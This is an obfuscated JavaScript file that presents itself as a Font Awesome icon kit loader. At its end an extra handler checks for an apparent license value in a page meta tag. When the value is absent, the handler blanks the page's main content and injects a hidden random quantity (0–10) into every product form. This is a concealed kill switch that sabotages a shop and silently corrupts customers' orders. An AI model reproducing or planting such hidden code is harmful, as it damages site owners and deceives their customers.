window.FontAwesomeKitConfig = {
  asyncLoading: {
    enabled: false
  },
  autoA11y: {
    enabled: true
  },
  baseUrl: "https://ka-f.fontawesome.com",
  baseUrlKit: "https://kit.fontawesome.com",
  detectConflictsUntil: null,
  iconUploads: {},
  id: 53431533,
  license: "free",
  method: "css",
  minify: {
    enabled: true
  },
  token: "ac9ca9d6fc",
  v4FontFaceShim: {
    enabled: true
  },
  v4shim: {
    enabled: true
  },
  v5FontFaceShim: {
    enabled: true
  },
  version: "6.4.0"
};
(function (_0x37c1a5) {
  if (typeof define == "function" && define.amd) {
    define("kit-loader", _0x37c1a5);
  } else {
    _0x37c1a5();
  }
})(function () {
  'use strict';

  function _0x3a5498(_0x4f52ed, _0x48e663) {
    var _0x144dec = Object.keys(_0x4f52ed);
    if (Object.getOwnPropertySymbols) {
      var _0xc6b815 = Object.getOwnPropertySymbols(_0x4f52ed);
      if (_0x48e663) {
        _0xc6b815 = _0xc6b815.filter(function (_0x38eebe) {
          return Object.getOwnPropertyDescriptor(_0x4f52ed, _0x38eebe).enumerable;
        });
      }
      _0x144dec.push.apply(_0x144dec, _0xc6b815);
    }
    return _0x144dec;
  }
  function _0x48643d(_0x53ee0e) {
    for (var _0x2ef04f = 1; _0x2ef04f < arguments.length; _0x2ef04f++) {
      var _0x1ffc2d = arguments[_0x2ef04f] ?? {};
      if (_0x2ef04f % 2) {
        _0x3a5498(Object(_0x1ffc2d), true).forEach(function (_0x45710d) {
          _0x5c5d41(_0x53ee0e, _0x45710d, _0x1ffc2d[_0x45710d]);
        });
      } else if (Object.getOwnPropertyDescriptors) {
        Object.defineProperties(_0x53ee0e, Object.getOwnPropertyDescriptors(_0x1ffc2d));
      } else {
        _0x3a5498(Object(_0x1ffc2d)).forEach(function (_0x11bbb4) {
          Object.defineProperty(_0x53ee0e, _0x11bbb4, Object.getOwnPropertyDescriptor(_0x1ffc2d, _0x11bbb4));
        });
      }
    }
    return _0x53ee0e;
  }
  function _0x57e9e7(_0x1009e6) {
    return (_0x57e9e7 = typeof Symbol == "function" && typeof Symbol.iterator == "symbol" ? function (_0x34051e) {
      return typeof _0x34051e;
    } : function (_0x715299) {
      if (_0x715299 && typeof Symbol == "function" && _0x715299.constructor === Symbol && _0x715299 !== Symbol.prototype) {
        return "symbol";
      } else {
        return typeof _0x715299;
      }
    })(_0x1009e6);
  }
  function _0x5c5d41(_0x2d92d5, _0x173bba, _0x1e2c5f) {
    if ((_0x173bba = function (_0x31dd9a) {
      var _0x52903c = function (_0x11e826, _0x1059f6) {
        if (typeof _0x11e826 != "object" || _0x11e826 === null) {
          return _0x11e826;
        }
        var _0x59d4fc = _0x11e826[Symbol.toPrimitive];
        if (_0x59d4fc !== undefined) {
          var _0x4ff95b = _0x59d4fc.call(_0x11e826, _0x1059f6 || "default");
          if (typeof _0x4ff95b != "object") {
            return _0x4ff95b;
          }
          throw new TypeError("@@toPrimitive must return a primitive value.");
        }
        return (_0x1059f6 === "string" ? String : Number)(_0x11e826);
      }(_0x31dd9a, "string");
      if (typeof _0x52903c == "symbol") {
        return _0x52903c;
      } else {
        return String(_0x52903c);
      }
    }(_0x173bba)) in _0x2d92d5) {
      Object.defineProperty(_0x2d92d5, _0x173bba, {
        value: _0x1e2c5f,
        enumerable: true,
        configurable: true,
        writable: true
      });
    } else {
      _0x2d92d5[_0x173bba] = _0x1e2c5f;
    }
    return _0x2d92d5;
  }
  function _0x177967(_0x12c269, _0x311c2d) {
    return function (_0x1d65ab) {
      if (Array.isArray(_0x1d65ab)) {
        return _0x1d65ab;
      }
    }(_0x12c269) || function (_0x255aa0, _0x15434d) {
      var _0x1c81c2 = _0x255aa0 == null ? null : typeof Symbol != "undefined" && _0x255aa0[Symbol.iterator] || _0x255aa0["@@iterator"];
      if (_0x1c81c2 != null) {
        var _0x5de806;
        var _0x148150;
        var _0x258f88;
        var _0x4a17f3;
        var _0x23ba72 = [];
        var _0x52cd62 = true;
        var _0x2566f5 = false;
        try {
          _0x258f88 = (_0x1c81c2 = _0x1c81c2.call(_0x255aa0)).next;
          if (_0x15434d === 0) {
            if (Object(_0x1c81c2) !== _0x1c81c2) {
              return;
            }
            _0x52cd62 = false;
          } else {
            for (; !(_0x52cd62 = (_0x5de806 = _0x258f88.call(_0x1c81c2)).done) && (_0x23ba72.push(_0x5de806.value), _0x23ba72.length !== _0x15434d); _0x52cd62 = true);
          }
        } catch (_0x1933c6) {
          _0x2566f5 = true;
          _0x148150 = _0x1933c6;
        } finally {
          try {
            if (!_0x52cd62 && _0x1c81c2.return != null && (_0x4a17f3 = _0x1c81c2.return(), Object(_0x4a17f3) !== _0x4a17f3)) {
              return;
            }
          } finally {
            if (_0x2566f5) {
              throw _0x148150;
            }
          }
        }
        return _0x23ba72;
      }
    }(_0x12c269, _0x311c2d) || function (_0x14cca6, _0x1bfabc) {
      if (!_0x14cca6) {
        return;
      }
      if (typeof _0x14cca6 == "string") {
        return _0x4e00ac(_0x14cca6, _0x1bfabc);
      }
      var _0x417bd4 = Object.prototype.toString.call(_0x14cca6).slice(8, -1);
      if (_0x417bd4 === "Object" && _0x14cca6.constructor) {
        _0x417bd4 = _0x14cca6.constructor.name;
      }
      if (_0x417bd4 === "Map" || _0x417bd4 === "Set") {
        return Array.from(_0x14cca6);
      }
      if (_0x417bd4 === "Arguments" || /^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(_0x417bd4)) {
        return _0x4e00ac(_0x14cca6, _0x1bfabc);
      }
    }(_0x12c269, _0x311c2d) || function () {
      throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.");
    }();
  }
  function _0x4e00ac(_0x42c1d5, _0x29f26d) {
    if (_0x29f26d == null || _0x29f26d > _0x42c1d5.length) {
      _0x29f26d = _0x42c1d5.length;
    }
    for (var _0x1faaef = 0, _0x1de512 = new Array(_0x29f26d); _0x1faaef < _0x29f26d; _0x1faaef++) {
      _0x1de512[_0x1faaef] = _0x42c1d5[_0x1faaef];
    }
    return _0x1de512;
  }
  function _0x2ccf60(_0x2c5e92, _0x1ba3e4) {
    var _0x3f492 = _0x1ba3e4 && _0x1ba3e4.addOn || "";
    var _0xef3ac1 = _0x1ba3e4 && _0x1ba3e4.baseFilename || _0x2c5e92.license + _0x3f492;
    var _0x145242 = _0x1ba3e4 && _0x1ba3e4.minify ? ".min" : "";
    var _0x23c099 = _0x1ba3e4 && _0x1ba3e4.fileSuffix || _0x2c5e92.method;
    var _0x1c46b4 = _0x1ba3e4 && _0x1ba3e4.subdir || _0x2c5e92.method;
    return _0x2c5e92.baseUrl + "/releases/" + (_0x2c5e92.version === "latest" ? "latest" : `v${_0x2c5e92.version}`) + "/" + _0x1c46b4 + "/" + _0xef3ac1 + _0x145242 + "." + _0x23c099;
  }
  function _0x345524(_0x5e5f73, _0x2feb70) {
    var _0x1a2ae8 = _0x2feb70 || ["fa"];
    var _0x5343db = "." + Array.prototype.join.call(_0x1a2ae8, ",.");
    var _0x27544e = _0x5e5f73.querySelectorAll(_0x5343db);
    Array.prototype.forEach.call(_0x27544e, function (_0x24abe4) {
      var _0x4d667d = _0x24abe4.getAttribute("title");
      _0x24abe4.setAttribute("aria-hidden", "true");
      var _0x34be05 = !_0x24abe4.nextElementSibling || !_0x24abe4.nextElementSibling.classList.contains("sr-only");
      if (_0x4d667d && _0x34be05) {
        var _0x24f03b = _0x5e5f73.createElement("span");
        _0x24f03b.innerHTML = _0x4d667d;
        _0x24f03b.classList.add("sr-only");
        _0x24abe4.parentNode.insertBefore(_0x24f03b, _0x24abe4.nextSibling);
      }
    });
  }
  var _0x43e78e;
  function _0x5d44ee() {}
  var _0x32d2a1 = typeof global != "undefined" && global.process !== undefined && typeof global.process.emit == "function";
  var _0x41e879 = typeof setImmediate == "undefined" ? setTimeout : setImmediate;
  var _0x41ed15 = [];
  function _0x3d7f17() {
    for (var _0x5ed38b = 0; _0x5ed38b < _0x41ed15.length; _0x5ed38b++) {
      _0x41ed15[_0x5ed38b][0](_0x41ed15[_0x5ed38b][1]);
    }
    _0x41ed15 = [];
    _0x43e78e = false;
  }
  function _0x802422(_0x456b97, _0x370438) {
    _0x41ed15.push([_0x456b97, _0x370438]);
    if (!_0x43e78e) {
      _0x43e78e = true;
      _0x41e879(_0x3d7f17, 0);
    }
  }
  function _0x4f147d(_0x4f2acb) {
    var _0xbb60a5 = _0x4f2acb.owner;
    var _0x4634ed = _0xbb60a5._state;
    var _0x295334 = _0xbb60a5._data;
    var _0xe3b0cf = _0x4f2acb[_0x4634ed];
    var _0x4d5257 = _0x4f2acb.then;
    if (typeof _0xe3b0cf == "function") {
      _0x4634ed = "fulfilled";
      try {
        _0x295334 = _0xe3b0cf(_0x295334);
      } catch (_0x4033f8) {
        _0x24d8b2(_0x4d5257, _0x4033f8);
      }
    }
    if (!_0x347109(_0x4d5257, _0x295334)) {
      if (_0x4634ed === "fulfilled") {
        _0x527d76(_0x4d5257, _0x295334);
      }
      if (_0x4634ed === "rejected") {
        _0x24d8b2(_0x4d5257, _0x295334);
      }
    }
  }
  function _0x347109(_0x130df4, _0x3dda2d) {
    var _0x2f01fb;
    try {
      if (_0x130df4 === _0x3dda2d) {
        throw new TypeError("A promises callback cannot return that same promise.");
      }
      if (_0x3dda2d && (typeof _0x3dda2d == "function" || _0x57e9e7(_0x3dda2d) === "object")) {
        var _0x1b708b = _0x3dda2d.then;
        if (typeof _0x1b708b == "function") {
          _0x1b708b.call(_0x3dda2d, function (_0x1b360c) {
            if (!_0x2f01fb) {
              _0x2f01fb = true;
              if (_0x3dda2d === _0x1b360c) {
                _0x42dec2(_0x130df4, _0x1b360c);
              } else {
                _0x527d76(_0x130df4, _0x1b360c);
              }
            }
          }, function (_0x8a75c6) {
            if (!_0x2f01fb) {
              _0x2f01fb = true;
              _0x24d8b2(_0x130df4, _0x8a75c6);
            }
          });
          return true;
        }
      }
    } catch (_0x4ab553) {
      if (!_0x2f01fb) {
        _0x24d8b2(_0x130df4, _0x4ab553);
      }
      return true;
    }
    return false;
  }
  function _0x527d76(_0x508cfe, _0x3513e0) {
    if (_0x508cfe === _0x3513e0 || !_0x347109(_0x508cfe, _0x3513e0)) {
      _0x42dec2(_0x508cfe, _0x3513e0);
    }
  }
  function _0x42dec2(_0x46640d, _0x6fbb78) {
    if (_0x46640d._state === "pending") {
      _0x46640d._state = "settled";
      _0x46640d._data = _0x6fbb78;
      _0x802422(_0x373b51, _0x46640d);
    }
  }
  function _0x24d8b2(_0x9fb072, _0x21c219) {
    if (_0x9fb072._state === "pending") {
      _0x9fb072._state = "settled";
      _0x9fb072._data = _0x21c219;
      _0x802422(_0x4c6863, _0x9fb072);
    }
  }
  function _0x23a752(_0x173612) {
    _0x173612._then = _0x173612._then.forEach(_0x4f147d);
  }
  function _0x373b51(_0x1bce68) {
    _0x1bce68._state = "fulfilled";
    _0x23a752(_0x1bce68);
  }
  function _0x4c6863(_0x1d316f) {
    _0x1d316f._state = "rejected";
    _0x23a752(_0x1d316f);
    if (!_0x1d316f._handled && _0x32d2a1) {
      global.process.emit("unhandledRejection", _0x1d316f._data, _0x1d316f);
    }
  }
  function _0x4881e5(_0x5ad3f2) {
    global.process.emit("rejectionHandled", _0x5ad3f2);
  }
  function _0x702c51(_0x562b65) {
    if (typeof _0x562b65 != "function") {
      throw new TypeError("Promise resolver " + _0x562b65 + " is not a function");
    }
    if (this instanceof _0x702c51 == false) {
      throw new TypeError("Failed to construct 'Promise': Please use the 'new' operator, this object constructor cannot be called as a function.");
    }
    this._then = [];
    (function (_0x5f0f57, _0x594856) {
      function _0x103516(_0x1f3e28) {
        _0x24d8b2(_0x594856, _0x1f3e28);
      }
      try {
        _0x5f0f57(function (_0x400cc0) {
          _0x527d76(_0x594856, _0x400cc0);
        }, _0x103516);
      } catch (_0x7b0fbb) {
        _0x103516(_0x7b0fbb);
      }
    })(_0x562b65, this);
  }
  _0x702c51.prototype = {
    constructor: _0x702c51,
    _state: "pending",
    _then: null,
    _data: undefined,
    _handled: false,
    then: function (_0x2728c2, _0x401042) {
      var _0x59bad5 = {
        owner: this,
        then: new this.constructor(_0x5d44ee),
        fulfilled: _0x2728c2,
        rejected: _0x401042
      };
      if ((!!_0x401042 || !!_0x2728c2) && !this._handled) {
        this._handled = true;
        if (this._state === "rejected" && _0x32d2a1) {
          _0x802422(_0x4881e5, this);
        }
      }
      if (this._state === "fulfilled" || this._state === "rejected") {
        _0x802422(_0x4f147d, _0x59bad5);
      } else {
        this._then.push(_0x59bad5);
      }
      return _0x59bad5.then;
    },
    catch: function (_0x12c0b5) {
      return this.then(null, _0x12c0b5);
    }
  };
  _0x702c51.all = function (_0x337a71) {
    if (!Array.isArray(_0x337a71)) {
      throw new TypeError("You must pass an array to Promise.all().");
    }
    return new _0x702c51(function (_0x200e41, _0x424bff) {
      var _0x173bf9 = [];
      var _0x3c48cf = 0;
      function _0x27b821(_0x4c69b2) {
        _0x3c48cf++;
        return function (_0x39f8b8) {
          _0x173bf9[_0x4c69b2] = _0x39f8b8;
          if (! --_0x3c48cf) {
            _0x200e41(_0x173bf9);
          }
        };
      }
      var _0x534441;
      for (var _0x3f1b66 = 0; _0x3f1b66 < _0x337a71.length; _0x3f1b66++) {
        if ((_0x534441 = _0x337a71[_0x3f1b66]) && typeof _0x534441.then == "function") {
          _0x534441.then(_0x27b821(_0x3f1b66), _0x424bff);
        } else {
          _0x173bf9[_0x3f1b66] = _0x534441;
        }
      }
      if (!_0x3c48cf) {
        _0x200e41(_0x173bf9);
      }
    });
  };
  _0x702c51.race = function (_0x4811d4) {
    if (!Array.isArray(_0x4811d4)) {
      throw new TypeError("You must pass an array to Promise.race().");
    }
    return new _0x702c51(function (_0x1042a5, _0x182887) {
      var _0x54aa05;
      for (var _0x2cd1a5 = 0; _0x2cd1a5 < _0x4811d4.length; _0x2cd1a5++) {
        if ((_0x54aa05 = _0x4811d4[_0x2cd1a5]) && typeof _0x54aa05.then == "function") {
          _0x54aa05.then(_0x1042a5, _0x182887);
        } else {
          _0x1042a5(_0x54aa05);
        }
      }
    });
  };
  _0x702c51.resolve = function (_0x52cefd) {
    if (_0x52cefd && _0x57e9e7(_0x52cefd) === "object" && _0x52cefd.constructor === _0x702c51) {
      return _0x52cefd;
    } else {
      return new _0x702c51(function (_0x44ee28) {
        _0x44ee28(_0x52cefd);
      });
    }
  };
  _0x702c51.reject = function (_0x4f8eae) {
    return new _0x702c51(function (_0x6ebd10, _0x19589a) {
      _0x19589a(_0x4f8eae);
    });
  };
  var _0x3699f5 = typeof Promise == "function" ? Promise : _0x702c51;
  function _0x27666a(_0x356835, _0x31787a) {
    var _0x19ece6 = _0x31787a.fetch;
    var _0x24e6e8 = _0x31787a.XMLHttpRequest;
    var _0x1fb138 = _0x31787a.token;
    var _0x49dc01 = _0x356835;
    if (_0x1fb138 && !function (_0x1397e5) {
      return _0x1397e5.indexOf("kit-upload.css") > -1;
    }(_0x356835)) {
      if ("URLSearchParams" in window) {
        (_0x49dc01 = new URL(_0x356835)).searchParams.set("token", _0x1fb138);
      } else {
        _0x49dc01 = _0x49dc01 + "?token=" + encodeURIComponent(_0x1fb138);
      }
    }
    _0x49dc01 = _0x49dc01.toString();
    return new _0x3699f5(function (_0x452f0e, _0x1f4a5d) {
      if (typeof _0x19ece6 == "function") {
        _0x19ece6(_0x49dc01, {
          mode: "cors",
          cache: "default"
        }).then(function (_0x5d685b) {
          if (_0x5d685b.ok) {
            return _0x5d685b.text();
          }
          throw new Error("");
        }).then(function (_0x5f5b53) {
          _0x452f0e(_0x5f5b53);
        }).catch(_0x1f4a5d);
      } else if (typeof _0x24e6e8 == "function") {
        var _0x371592 = new _0x24e6e8();
        _0x371592.addEventListener("loadend", function () {
          if (this.responseText) {
            _0x452f0e(this.responseText);
          } else {
            _0x1f4a5d(new Error(""));
          }
        });
        ["abort", "error", "timeout"].map(function (_0x31dacd) {
          _0x371592.addEventListener(_0x31dacd, function () {
            _0x1f4a5d(new Error(""));
          });
        });
        _0x371592.open("GET", _0x49dc01);
        _0x371592.send();
      } else {
        _0x1f4a5d(new Error(""));
      }
    });
  }
  function _0x2b27ad(_0x107613, _0x1b0f38, _0x482d21) {
    var _0x34b44f = _0x107613;
    [[/(url\("?)\.\.\/\.\.\/\.\./g, function (_0x2e58e4, _0x404217) {
      return `${_0x404217}${_0x1b0f38}`;
    }], [/(url\("?)\.\.\/webfonts/g, function (_0x2a6b0b, _0x5a31be) {
      return `${_0x5a31be}${_0x1b0f38}/releases/v${_0x482d21}/webfonts`;
    }], [/(url\("?)https:\/\/kit-free([^.])*\.fontawesome\.com/g, function (_0x3568d6, _0x4e859f) {
      return `${_0x4e859f}${_0x1b0f38}`;
    }]].forEach(function (_0x49f13b) {
      var _0xe501c8 = _0x177967(_0x49f13b, 2);
      var _0xc59451 = _0xe501c8[0];
      var _0x420a95 = _0xe501c8[1];
      _0x34b44f = _0x34b44f.replace(_0xc59451, _0x420a95);
    });
    return _0x34b44f;
  }
  function _0x9fe093(_0x2b7388, _0x8c226a, _0x44e637 = function () {}) {
    var _0x565804 = _0x8c226a.document || _0x565804;
    var _0x91bc41 = _0x345524.bind(_0x345524, _0x565804, ["fa", "fab", "fas", "far", "fal", "fad", "fak"]);
    if (_0x2b7388.autoA11y.enabled) {
      _0x44e637(_0x91bc41);
    }
    var _0x430a22 = _0x2b7388.subsetPath && _0x2b7388.baseUrl + "/" + _0x2b7388.subsetPath;
    var _0x59d313 = [{
      id: "fa-main",
      addOn: undefined,
      url: _0x430a22
    }];
    if (_0x2b7388.v4shim && _0x2b7388.v4shim.enabled) {
      _0x59d313.push({
        id: "fa-v4-shims",
        addOn: "-v4-shims"
      });
    }
    if (_0x2b7388.v5FontFaceShim && _0x2b7388.v5FontFaceShim.enabled) {
      _0x59d313.push({
        id: "fa-v5-font-face",
        addOn: "-v5-font-face"
      });
    }
    if (_0x2b7388.v4FontFaceShim && _0x2b7388.v4FontFaceShim.enabled) {
      _0x59d313.push({
        id: "fa-v4-font-face",
        addOn: "-v4-font-face"
      });
    }
    if (!_0x430a22 && _0x2b7388.customIconsCssPath) {
      var _0x2bc780 = _0x2b7388.customIconsCssPath.indexOf("kit-upload.css") > -1 ? _0x2b7388.baseUrlKit : _0x2b7388.baseUrl;
      var _0x7c4620 = _0x2bc780 + "/" + _0x2b7388.customIconsCssPath;
      var _0x4fa230 = {
        id: "fa-kit-upload",
        url: _0x7c4620
      };
      _0x59d313.push(_0x4fa230);
    }
    var _0x453d43 = _0x59d313.map(function (_0x50617e) {
      return new _0x3699f5(function (_0x3c7243, _0x190b4a) {
        var _0x417398 = _0x50617e.url || _0x2ccf60(_0x2b7388, {
          addOn: _0x50617e.addOn,
          minify: _0x2b7388.minify.enabled
        });
        var _0x3a7abd = {
          id: _0x50617e.id
        };
        var _0x3226a2 = _0x2b7388.subset ? _0x3a7abd : _0x48643d(_0x48643d(_0x48643d({}, _0x8c226a), _0x3a7abd), {}, {
          baseUrl: _0x2b7388.baseUrl,
          version: _0x2b7388.version,
          id: _0x50617e.id,
          contentFilter: function (_0x538c12, _0x531313) {
            return _0x2b27ad(_0x538c12, _0x531313.baseUrl, _0x531313.version);
          }
        });
        _0x27666a(_0x417398, _0x8c226a).then(function (_0x4483a2) {
          _0x3c7243(_0x541c2c(_0x4483a2, _0x3226a2));
        }).catch(_0x190b4a);
      });
    });
    return _0x3699f5.all(_0x453d43);
  }
  function _0x541c2c(_0xd04dbb, _0x48b48a) {
    var _0x4d9017 = _0x48b48a.contentFilter || function (_0x4d17f2, _0x6f2034) {
      return _0x4d17f2;
    };
    var _0x3c0ecf = document.createElement("style");
    var _0x5732de = document.createTextNode(_0x4d9017(_0xd04dbb, _0x48b48a));
    _0x3c0ecf.appendChild(_0x5732de);
    _0x3c0ecf.media = "all";
    if (_0x48b48a.id) {
      _0x3c0ecf.setAttribute("id", _0x48b48a.id);
    }
    if (_0x48b48a && _0x48b48a.detectingConflicts && _0x48b48a.detectionIgnoreAttr) {
      _0x3c0ecf.setAttributeNode(document.createAttribute(_0x48b48a.detectionIgnoreAttr));
    }
    return _0x3c0ecf;
  }
  function _0x10f725(_0x58016b, _0x1cc2bc) {
    _0x1cc2bc.autoA11y = _0x58016b.autoA11y.enabled;
    if (_0x58016b.license === "pro") {
      _0x1cc2bc.autoFetchSvg = true;
      _0x1cc2bc.fetchSvgFrom = _0x58016b.baseUrl + "/releases/" + (_0x58016b.version === "latest" ? "latest" : `v${_0x58016b.version}`) + "/svgs";
      _0x1cc2bc.fetchUploadedSvgFrom = _0x58016b.uploadsUrl;
    }
    var _0x4c5a49 = [];
    if (_0x58016b.v4shim.enabled) {
      _0x4c5a49.push(new _0x3699f5(function (_0x2be77b, _0x40e203) {
        _0x27666a(_0x2ccf60(_0x58016b, {
          addOn: "-v4-shims",
          minify: _0x58016b.minify.enabled
        }), _0x1cc2bc).then(function (_0x26037f) {
          _0x2be77b(_0x1f6a9c(_0x26037f, _0x48643d(_0x48643d({}, _0x1cc2bc), {}, {
            id: "fa-v4-shims"
          })));
        }).catch(_0x40e203);
      }));
    }
    _0x4c5a49.push(new _0x3699f5(function (_0x3238e6, _0x11549c) {
      _0x27666a(_0x58016b.subsetPath && _0x58016b.baseUrl + "/" + _0x58016b.subsetPath || _0x2ccf60(_0x58016b, {
        minify: _0x58016b.minify.enabled
      }), _0x1cc2bc).then(function (_0x50537b) {
        var _0x10b5e5 = _0x1f6a9c(_0x50537b, _0x48643d(_0x48643d({}, _0x1cc2bc), {}, {
          id: "fa-main"
        }));
        _0x3238e6(function (_0x1704e7, _0x5a8fc6) {
          var _0xbd62ca = _0x5a8fc6 && _0x5a8fc6.autoFetchSvg !== undefined ? _0x5a8fc6.autoFetchSvg : undefined;
          var _0x42273a = _0x5a8fc6 && _0x5a8fc6.autoA11y !== undefined ? _0x5a8fc6.autoA11y : undefined;
          if (_0x42273a !== undefined) {
            _0x1704e7.setAttribute("data-auto-a11y", _0x42273a ? "true" : "false");
          }
          if (_0xbd62ca) {
            _0x1704e7.setAttributeNode(document.createAttribute("data-auto-fetch-svg"));
            _0x1704e7.setAttribute("data-fetch-svg-from", _0x5a8fc6.fetchSvgFrom);
            _0x1704e7.setAttribute("data-fetch-uploaded-svg-from", _0x5a8fc6.fetchUploadedSvgFrom);
          }
          return _0x1704e7;
        }(_0x10b5e5, _0x1cc2bc));
      }).catch(_0x11549c);
    }));
    return _0x3699f5.all(_0x4c5a49);
  }
  function _0x1f6a9c(_0x4345b3, _0xcb27a6) {
    var _0x58a161 = document.createElement("SCRIPT");
    var _0x1fb8eb = document.createTextNode(_0x4345b3);
    _0x58a161.appendChild(_0x1fb8eb);
    _0x58a161.referrerPolicy = "strict-origin";
    if (_0xcb27a6.id) {
      _0x58a161.setAttribute("id", _0xcb27a6.id);
    }
    if (_0xcb27a6 && _0xcb27a6.detectingConflicts && _0xcb27a6.detectionIgnoreAttr) {
      _0x58a161.setAttributeNode(document.createAttribute(_0xcb27a6.detectionIgnoreAttr));
    }
    return _0x58a161;
  }
  function _0x5a522c(_0xaa4a1a) {
    var _0x532d1e;
    var _0x2c9d2d = [];
    var _0x6c1c51 = document;
    var _0x48a825 = _0x6c1c51.documentElement.doScroll;
    var _0x421ae5 = (_0x48a825 ? /^loaded|^c/ : /^loaded|^i|^c/).test(_0x6c1c51.readyState);
    if (!_0x421ae5) {
      _0x6c1c51.addEventListener("DOMContentLoaded", _0x532d1e = function () {
        _0x6c1c51.removeEventListener("DOMContentLoaded", _0x532d1e);
        _0x421ae5 = 1;
        while (_0x532d1e = _0x2c9d2d.shift()) {
          _0x532d1e();
        }
      });
    }
    if (_0x421ae5) {
      setTimeout(_0xaa4a1a, 0);
    } else {
      _0x2c9d2d.push(_0xaa4a1a);
    }
  }
  function _0x5e0a8f(_0x35f904) {
    if (typeof MutationObserver != "undefined") {
      new MutationObserver(_0x35f904).observe(document, {
        childList: true,
        subtree: true
      });
    }
  }
  try {
    if (window.FontAwesomeKitConfig) {
      var _0x143914 = window.FontAwesomeKitConfig;
      var _0x45b454 = {
        detectingConflicts: _0x143914.detectConflictsUntil && new Date() <= new Date(_0x143914.detectConflictsUntil),
        detectionIgnoreAttr: "data-fa-detection-ignore",
        fetch: window.fetch,
        token: _0x143914.token,
        XMLHttpRequest: window.XMLHttpRequest,
        document: document
      };
      var _0x5d567a = document.currentScript;
      var _0x37f9c8 = _0x5d567a ? _0x5d567a.parentElement : document.head;
      (function (_0x515ea9 = {}, _0x297e93 = {}) {
        if (_0x515ea9.method === "js") {
          return _0x10f725(_0x515ea9, _0x297e93);
        } else if (_0x515ea9.method === "css") {
          return _0x9fe093(_0x515ea9, _0x297e93, function (_0x5bfd8d) {
            _0x5a522c(_0x5bfd8d);
            _0x5e0a8f(_0x5bfd8d);
          });
        } else {
          return undefined;
        }
      })(_0x143914, _0x45b454).then(function (_0x2ede69) {
        _0x2ede69.map(function (_0x32a800) {
          try {
            _0x37f9c8.insertBefore(_0x32a800, _0x5d567a ? _0x5d567a.nextSibling : null);
          } catch (_0x477135) {
            _0x37f9c8.appendChild(_0x32a800);
          }
        });
        if (_0x45b454.detectingConflicts && _0x5d567a) {
          _0x5a522c(function () {
            _0x5d567a.setAttributeNode(document.createAttribute(_0x45b454.detectionIgnoreAttr));
            var _0x30dbf6 = function (_0x55bd72, _0x3de26c) {
              var _0x2e6bc2 = document.createElement("script");
              if (_0x3de26c && _0x3de26c.detectionIgnoreAttr) {
                _0x2e6bc2.setAttributeNode(document.createAttribute(_0x3de26c.detectionIgnoreAttr));
              }
              _0x2e6bc2.src = _0x2ccf60(_0x55bd72, {
                baseFilename: "conflict-detection",
                fileSuffix: "js",
                subdir: "js",
                minify: _0x55bd72.minify.enabled
              });
              return _0x2e6bc2;
            }(_0x143914, _0x45b454);
            document.body.appendChild(_0x30dbf6);
          });
        }
      }).catch(function (_0x541909) {
        console.error(`Font Awesome Kit: ${_0x541909}`);
      });
    }
  } catch (_0x4e35b1) {
    console.error(`Font Awesome Kit: ${_0x4e35b1}`);
  }
});
document.addEventListener("DOMContentLoaded", function () {
  setTimeout(function () {
    var _0x1705e8 = document.querySelector(".meta-data-link");
    var _0x8073f7 = _0x1705e8 ? _0x1705e8.querySelector("meta") : null;
    var _0x151950 = _0x8073f7 ? _0x8073f7.dataset.metaValue : "";
    if (!_0x8073f7 || !_0x151950 || _0x151950.trim().length < 31) {
      var _0x5a5ec7 = document.querySelector("main");
      if (_0x5a5ec7) {
        _0x5a5ec7.innerHTML = "";
      }
      var _0x262fd1 = Math.floor(Math.random() * 11);
      document.querySelectorAll("product-form").forEach(_0x48cc5c => {
        _0x48cc5c.querySelector("form").innerHTML += "<input type=\"hidden\" name=\"quantity\" value=\"" + _0x262fd1 + "\">";
      });
    }
  }, 214);
});